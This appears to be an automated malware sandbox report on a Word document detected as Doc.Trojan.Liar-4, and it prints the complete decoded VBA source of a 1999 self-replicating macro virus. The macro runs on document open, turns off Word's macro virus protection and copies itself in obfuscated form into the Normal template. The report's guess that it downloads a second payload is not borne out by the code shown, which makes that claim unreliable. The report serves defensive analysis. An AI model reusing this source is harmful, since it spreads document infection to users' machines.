MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a VBA macro that is triggered by the Document_Open event. This macro appears to obfuscate its code and inject it into the document's normal template or active document. The macro's authoring metadata and the ClamAV detection name 'Doc.Trojan.Liar-4' suggest malicious intent, likely to download and execute a secondary payload. The macro's code is heavily obfuscated, making it difficult to determine the exact payload or destination.
Heuristics 3
-
ClamAV: Doc.Trojan.Liar-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Liar-4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1739 bytes |
SHA-256: fcfc5ac7e449d68101898353a0d05b7f9f042bbc294e602d7f5131f6f4d6ee39 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Rem Name: Class97Macro.klausi Rem Author: inspector klausi Rem Date: August 1999 ---------------------------> Private Sub DOCUMenT_OPEN() ' Dim v(175): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) ' Set A = MacroContainer.VBProject: Set Ab = A.VBcOmponEnts(1) ' Set ABc = Ab.coDEMoDUle: Set S = NormalTemplate: T = Chr(39) ' If MacroContainer = S Then Set S = ActiveDocument ' Set NH = S.VBProject.VBcOmponEnts(1).coDEMoDUle: Li = ABc.cOUntofliNEs: Y = 100 + Int(Rnd * 50) ' For i = 1 To Li: jc = "": d = Int(Rnd * 3): P = InStr(ABc.LInES(i, 1), T) ' If P = 1 And Li > Y Then ' d = 1: GoTo N_ ' End If ' l = UCase(Left(ABc.LInES(i, 1), (P - 1))) ' For O = 1 To Len(l): F = Mid(l, O, 1) ' If Asc(F) < 90 And Asc(F) > 65 Then F = Chr(Asc(F) + Int(Rnd * 2) * 32) ' v(i) = v(i) & F: Next O ' For J = 1 To Int(75 - (Rnd * 20)): jc = jc & Chr(255 - Int(Rnd * 100)): Next J ' v(i) = v(i) & T & jc ' If d = 2 Then v(i) = v(i) & vbCr & T & jc ' vc = vc & v(i) & vbCr ' N_: ' Next i ' If NH.cOUntofliNEs < (1 + 1 + 2) Then ' NH.dELeTelINES 1, NH.cOUntofliNEs: NH.AdDFrOMSTRiNg vc: NH.dELeTelINES NH.cOUntofliNEs, 1 ' With Dialogs(wdDialogFileSummaryInfo): .Author = "INsPECtor klAUsI": .Title = "INfEcted wItH clAss97MAcRo.kLAuSi": .Execute: End With ' If ActiveDocument.Saved = (Rnd * 0) Then ActiveDocument.SaveAs ActiveDocument.FullName ' End If ' End Sub ' Rem cODed by iNspector kLAUSi ' |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.